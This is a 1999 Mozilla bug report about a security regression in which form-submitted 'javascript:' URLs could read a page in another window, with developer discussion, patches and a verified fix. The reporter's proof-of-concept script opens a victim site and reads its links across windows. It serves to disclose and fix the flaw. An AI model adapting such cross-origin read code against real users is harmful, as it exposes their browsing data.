Closed Bug 18653 Opened 25 years ago Closed 25 years ago

"javascript:" URLs cross windows problems (probably regression bug)

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

Attachments

(2 files)

nsDocLoader.diff
3.64 KB, patch
Details | Diff | Splinter Review
nsJSProtocolHandler.diff
2.07 KB, patch
Details | Diff | Splinter Review
In builds 19991110 and 1999111108 (I think previous builds are unaffected) "javascript:" URLs across windows reveals the DOM of the target document (guess this is a regression bug). The code is: --------------------------------------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com","victim"); setTimeout("document.forms[0].submit()",10000); </SCRIPT> <FORM ACTION="javascript:s='Here are some links: ';for(i=0;i< ( (document.links.length < 10) ? document.links.length : 10) ;i++) s += document.links[i].href +String.fromCharCode(10);alert(s);" TARGET="victim" METHOD="POST"> <INPUT TYPE="SUBMIT"> </FORM> ---------------------------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M13
Assignee: norris → nisheeth
Status: ASSIGNED → NEW
Nisheeth, I wonder if your changes in this area may have caused this regression. If you put a breakpoint in nsJSProtocolHandler::NewChannel and load the above URL, you'll see that when it gets the URI from the webshell it gets yahoo rather than the attacker page, so we fail to stop the attack. Can you take a look at this? I'm happy to help out, but I don't know much about URLLoaders.
Status: NEW → ASSIGNED
Accepting bug.
Assignee: nisheeth → norris
Status: ASSIGNED → NEW
The change that I had made earlier is documented in bug 1646. We assumed that the referrer of the url being loaded in nsJSProtocol::NewChannel() is accessed by calling nsWebshell->GetURL(). This assumption is not true for the case when a form is submitted by an "attacking" webshell targeted at a "victim" webshell. In that case, nsWebShell->GetURL() returns the URL of the victim webshell while the correct referrer url is the URL of the attacking webshell. The fix is to pass the referring URL from the doc loader on to the JS protocol handler. If the referrer url parameter to nsJSProtocolHandler::NewChannel() is non-null, that url is used as the referrer url. If the parameter is null, the earlier method of calling nsWebshell->GetURL() is used to determine the referrer url. The patches to nsDocLoader.cpp and nsJSProtocolHandler.cpp are attached. Even with these patches, the call to the security manager's GetCodebasePrincipal() returns successfully and the attack succeeds. Re-assigning this to Norris so that he can take it from here.
Attached patch nsDocLoader.diffSplinter Review
Target Milestone: M13 → M14
These bugs didn't make M13, postpone until M14.
Status: NEW → ASSIGNED
Merged nisheeth's patches into the latest version. (I'd fixed the other problem in another bug.)
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: